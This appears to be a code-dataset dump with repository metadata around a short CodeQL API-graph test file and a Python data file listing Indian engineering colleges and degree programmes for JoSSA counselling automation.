|
[
"MIT"
] | 4,036
|
2020-04-29T00:09:57.000Z
|
2022-03-31T14:16:38.000Z
|
python/ql/test/experimental/dataflow/ApiGraphs/test4.py
|
timoles/codeql
|
2d24387e9e300bf03be35694816b1e76ae88a50c
|
[
"MIT"
] | 2,970
|
2020-04-28T17:24:18.000Z
|
2022-03-31T22:40:46.000Z
|
python/ql/test/experimental/dataflow/ApiGraphs/test4.py
|
ScriptBox99/github-codeql
|
2ecf0d3264db8fb4904b2056964da469372a235c
|
[
"MIT"
] | 794
|
2020-04-29T00:28:25.000Z
|
2022-03-30T08:21:46.000Z
|
import mypkg.foo as _foo #$ use=moduleImport("mypkg").getMember("foo")
import mypkg.bar as _bar #$ use=moduleImport("mypkg").getMember("bar")
print(_foo) #$ use=moduleImport("mypkg").getMember("foo") // <module 'mypkg.foo' ...
print(_bar) #$ use=moduleImport("mypkg").getMember("bar") // <module 'mypkg.bar' ...
| 62.4
| 84
| 0.685897
| 40
| 312
| 5.25
| 0.25
| 0.285714
| 0.380952
| 0.552381
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 312
| 4
| 85
| 78
| 0.734266
| 0.737179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
c1c8e0ec73fb213ba531269ddf69a3f77ce88757
| 45,686
|
py
|
Python
|
data_collection.py
|
Theskyspace/JoSSA-automation
|
b683451268fba34d70a32510f5a8bff3dc6de304
|
[
"Apache-2.0"
] | null | null | null |
data_collection.py
|
Theskyspace/JoSSA-automation
|
b683451268fba34d70a32510f5a8bff3dc6de304
|
[
"Apache-2.0"
] | null | null | null |
data_collection.py
|
Theskyspace/JoSSA-automation
|
b683451268fba34d70a32510f5a8bff3dc6de304
|
[
"Apache-2.0"
] | null | null | null |
colleges = [
'National Institute of Technology, Kurukshetra' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Engineering Science and Technology, Shibpur' ,
'National Institute of Technology Delhi' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology, Tiruchirappalli' ,
'Maulana Azad National Institute of Technology Bhopal' ,
'National Institute of Technology Hamirpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Silchar' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Uttarakhand' ,
'Malaviya National Institute of Technology Jaipur' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology, Tiruchirappalli' ,
'National Institute of Technology Patna' ,
'National Institute of Technology Karnataka, Surathkal' ,
'National Institute of Technology Calicut' ,
'Sardar Vallabhbhai National Institute of Technology, Surat' ,
'National Institute of Technology Raipur' ,
'Indian Institute of Information Technology Lucknow' ,
'Punjab Engineering College, Chandigarh' ,
'Visvesvaraya National Institute of Technology, Nagpur' ,
'National Institute of Technology, Warangal' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Engineering Science and Technology, Shibpur' ,
'National Institute of Technology, Jamshedpur' ,
'Malaviya National Institute of Technology Jaipur' ,
'Dr. B R Ambedkar National Institute of Technology, Jalandhar' ,
'National Institute of Technology, Kurukshetra' ,
'National Institute of Technology Puducherry' ,
'University of Hyderabad' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology Goa' ,
'Pt. Dwarka Prasad Mishra Indian Institute ofInformation Technology, Design & Manufacture Jabalpur' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'National Institute of Technology Delhi' ,
'National Institute of Technology, Warangal' ,
'National Institute of Technology Hamirpur' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Atal Bihari Vajpayee Indian Institute of Information Technology& Management Gwalior' ,
'National Institute of Technology Meghalaya' ,
'Indian Institute of Information Technology Lucknow' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Kurukshetra' ,
'National Institute of Technology, Tiruchirappalli' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'National Institute of Technology Calicut' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Karnataka, Surathkal' ,
'National Institute of Technology, Silchar' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Rourkela' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology, Rourkela' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'National Institute of Technology, Jamshedpur' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology Goa' ,
'Punjab Engineering College, Chandigarh' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology Puducherry' ,
'National Institute of Technology Hamirpur' ,
'National Institute of Technology, Tiruchirappalli' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Uttarakhand' ,
'Jawaharlal Nehru University, Delhi' ,
'Atal Bihari Vajpayee Indian Institute of Information Technology& Management Gwalior' ,
'National Institute of Technology Patna' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Information Technology(IIIT)Kilohrad, Sonepat, Haryana' ,
'International Institute of Information Technology,Naya Raipur' ,
'National Institute of Technology Hamirpur' ,
'Malaviya National Institute of Technology Jaipur' ,
'National Institute of Technology Goa' ,
'National Institute of Technology, Jamshedpur' ,
'Indian Institute of Information Technology Guwahati' ,
'Punjab Engineering College, Chandigarh' ,
'Indian Institute of Information Technology Srirangam,Tiruchirappalli' ,
'National Institute of Technology, Rourkela' ,
'International Institute of Information Technology,Naya Raipur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian institute of information technology, Raichur,Karnataka' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology Hamirpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'International Institute of Information Technology,Bhubaneswar' ,
'National Institute of Technology, Warangal' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology Karnataka, Surathkal' ,
'Indian Institute of Information Technology Surat' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Indian Institute of Information Technology (IIIT)Kota,Rajasthan' ,
'National Institute of Technology, Srinagar' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology Calicut' ,
'National Institute of Technology, Silchar' ,
'Indian Institute of Information Technology (IIIT) Pune' ,
'Pt. Dwarka Prasad Mishra Indian Institute ofInformation Technology, Design & Manufacture Jabalpur' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'National Institute of Technology, Rourkela' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology Raipur' ,
'Punjab Engineering College, Chandigarh' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'National Institute of Technology, Rourkela' ,
'Malaviya National Institute of Technology Jaipur' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Puducherry' ,
'Indian Institute of Information Technology(IIIT)Kilohrad, Sonepat, Haryana' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology Patna' ,
'National Institute of Technology, Silchar' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'Indian Institute of Information Technology (IIIT), SriCity, Chittoor' ,
'National Institute of Technology, Kurukshetra' ,
'Jawaharlal Nehru University, Delhi' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'National Institute of Technology, Manipur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Mizoram' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology Puducherry' ,
'National Institute of Technology, Uttarakhand' ,
'National Institute of Technology Nagaland' ,
'National Institute of Technology, Uttarakhand' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology Meghalaya' ,
'National Institute of Technology Patna' ,
'National Institute of Technology Karnataka, Surathkal' ,
'National Institute of Technology, Silchar' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Information Technology(IIIT),Vadodara, Gujrat' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian Institute of Information Technology Bhopal' ,
'National Institute of Technology, Andhra Pradesh' ,
'National Institute of Technology, Warangal' ,
'Indian Institute of Information Technology (IIIT) Pune' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Information Technology Srirangam,Tiruchirappalli' ,
'Indian Institute of Information Technology, Design & Manufacturing, Kancheepuram' ,
'National Institute of Technology Agartala' ,
'Indian Institute of Information Technology(IIIT) Una,Himachal Pradesh' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Agartala' ,
'International Institute of Information Technology,Naya Raipur' ,
'Indian Institute of Information Technology (IIIT), SriCity, Chittoor' ,
'National Institute of Technology, Manipur' ,
'National Institute of Technology, Jamshedpur' ,
'National Institute of Technology Durgapur' ,
'Indian Institute of Information Technology(IIIT),Vadodara, Gujrat' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian Institute of Information Technology (IIIT)Nagpur' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology Hamirpur' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Meghalaya' ,
'National Institute of Technology Hamirpur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Information Technology Guwahati' ,
'Indian Institute of Information Technology (IIIT)Kota,Rajasthan' ,
'National Institute of Technology Goa' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology Nagaland' ,
'Indian Institute of Information Technology Design &Manufacturing Kurnool, Andhra Pradesh' ,
'National Institute of Technology, Kurukshetra' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology Puducherry' ,
'Indian Institute of Information Technology (IIIT)Ranchi' ,
'National Institute of Technology Meghalaya' ,
'Indian Institute of Information Technology Bhopal' ,
'Indian Institute of Information Technology(IIIT)Kottayam' ,
'Indian Institute of Information Technology, Design & Manufacturing, Kancheepuram' ,
'National Institute of Technology, Rourkela' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology, Mizoram' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Information Technology(IIIT) Una,Himachal Pradesh' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology, Rourkela' ,
'Indian Institute of Information Technology(IIIT)Dharwad' ,
'National Institute of Technology Calicut' ,
'National Institute of Technology Patna' ,
'Indian Institute of Information Technology Surat' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology, Silchar' ,
'Pt. Dwarka Prasad Mishra Indian Institute ofInformation Technology, Design & Manufacture Jabalpur' ,
'Indian Institute of Information Technology(IIIT)Kalyani, West Bengal' ,
'National Institute of Technology, Uttarakhand' ,
'Central University of Rajasthan, Rajasthan' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Punjab Engineering College, Chandigarh' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'Malaviya National Institute of Technology Jaipur' ,
'National Institute of Technology Arunachal Pradesh' ,
'Indian Institute of Information Technology Bhopal' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'Indian Institute of Information Technology (IIIT)Nagpur' ,
'National Institute of Technology, Andhra Pradesh' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Pondicherry Engineering College, Puducherry' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology, Manipur' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Indian Institute of Information Technology Design &Manufacturing Kurnool, Andhra Pradesh' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology, Manipur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology, Jamshedpur' ,
'National Institute of Technology Hamirpur' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology, Andhra Pradesh' ,
'Institute of Infrastructure, Technology, Research andManagement-Ahmedabad' ,
'National Institute of Technology Sikkim' ,
'J.K. Institute of Applied Physics & Technology,Department of Electronics & Communication, University of Allahabad- Allahabad' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'Indian Institute of Information Technology(IIIT)Dharwad' ,
'Indian Institute of Information Technology, Agartala' ,
'National Institute of Technology, Rourkela' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology, Jamshedpur' ,
'Indian Institute of Information Technology (IIIT)Ranchi' ,
'National Institute of Technology Agartala' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Indian Institute of Information Technology Bhagalpur' ,
'Indian Institute of Information Technology(IIIT) Una,Himachal Pradesh' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology, Rourkela' ,
'Punjab Engineering College, Chandigarh' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Nagaland' ,
'Indian Institute of Information Technology Manipur' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology Meghalaya' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Institute of Infrastructure, Technology, Research andManagement-Ahmedabad' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology, Mizoram' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology Patna' ,
'Central University of Rajasthan, Rajasthan' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'Indian Institute of Information Technology Bhagalpur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology, Mizoram' ,
'National Institute of Technology, Manipur' ,
'Indian Institute of Information Technology Design &Manufacturing Kurnool, Andhra Pradesh' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology, Andhra Pradesh' ,
'National Institute of Technology Patna' ,
'J.K. Institute of Applied Physics & Technology,Department of Electronics & Communication, University of Allahabad- Allahabad' ,
'National Institute of Technology Raipur' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Assam University, Silchar' ,
'National Institute of Technology Durgapur' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'National Institute of Technology Nagaland' ,
'National Institute of Technology Nagaland' ,
'Pondicherry Engineering College, Puducherry' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Information Technology Manipur' ,
'Institute of Infrastructure, Technology, Research andManagement-Ahmedabad' ,
'National Institute of Technology Raipur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian Institute of Information Technology Bhagalpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Mizoram' ,
'National Institute of Electronics and Information Technology,Aurangabad (Maharashtra)' ,
'National Institute of Technology Nagaland' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Srinagar' ,
'Punjab Engineering College, Chandigarh' ,
'National Institute of Technology Agartala' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Pondicherry Engineering College, Puducherry' ,
'National Institute of Technology Agartala' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'National Institute of Technology, Rourkela' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'National Institute of Technology Patna' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'National Institute of Technology Raipur' ,
'Central institute of Technology Kokrajar, Assam' ,
'National Institute of Technology, Srinagar' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Assam University, Silchar' ,
'Central institute of Technology Kokrajar, Assam' ,
'National Institute of Technology Agartala' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Pondicherry Engineering College, Puducherry' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Mizoram University, Aizawl' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Mizoram University, Aizawl' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Ghani Khan Choudhary Institute of Engineering andTechnology, Malda, West Bengal' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Central institute of Technology Kokrajar, Assam' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Central institute of Technology Kokrajar, Assam' ,
'Ghani Khan Choudhary Institute of Engineering andTechnology, Malda, West Bengal' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'National Institute of Foundry & Forge Technology,Hatia, Ranchi' ,
'Mizoram University, Aizawl' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Mizoram University, Aizawl' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Mizoram University, Aizawl' ,
'National Institute of Foundry & Forge Technology,Hatia, Ranchi' ,
'Assam University, Silchar' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Central institute of Technology Kokrajar, Assam' ,
'Indian Institute of Carpet Technology, Bhadohi' ,
'Institute of Technology, Guru Ghasidas Vishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Ghani Khan Choudhary Institute of Engineering andTechnology, Malda, West Bengal' ,
'School of Engineering, Tezpur University, Napaam, Tezpur' ,
'National Institute of Food Technology Entrepreneurship and Management, Sonepat, Haryana' ,
]
Streams = [
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Instrumentation and Control Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Aerospace Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science (5 Years, Integrated Master of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Integrated B. Tech.(IT) and M. Tech (IT) (5 Years, Integrated B. Tech. andM. Tech. /MBA)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Physics (5 Years, Integrated Master of Science)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Engineering Physics (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Telecommunication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Aerospace Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Integrated B. Tech.(IT) and MBA (5 Years, Integrated B. Tech. and M. Tech./MBA)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Data Science and Artificial Intelligence (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (5 Years, Bachelor and Masterof Technology (Dual Degree))' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Mathematics (5 Years, Integrated Master of Science)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (5 Years, Bachelor and Masterof Technology (Dual Degree))' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Mathematics and Computing (5 Years, Integrated Master of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'B. Tech. Electronics and Communication Engineering and M. Tech. Electronics andCommunication Engineering with specialization in VLSI Design (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
